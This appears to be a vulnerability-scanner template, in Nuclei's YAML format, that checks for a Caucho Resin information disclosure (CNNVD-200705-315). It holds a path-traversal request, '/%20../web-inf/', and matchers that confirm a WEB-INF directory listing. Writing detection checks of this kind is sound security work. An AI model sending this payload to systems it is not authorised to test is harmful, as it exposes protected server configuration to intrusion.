id: CNNVD-200705-315
info:
  name: Caucho Resin Information Disclosure
  author: princechaddha
  severity: high
  reference: |
    - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315
  tags: resin,caucho,lfr

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%20../web-inf/"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "/ ../web-inf/"
          - "Directory of /"
        condition: and
        part: body
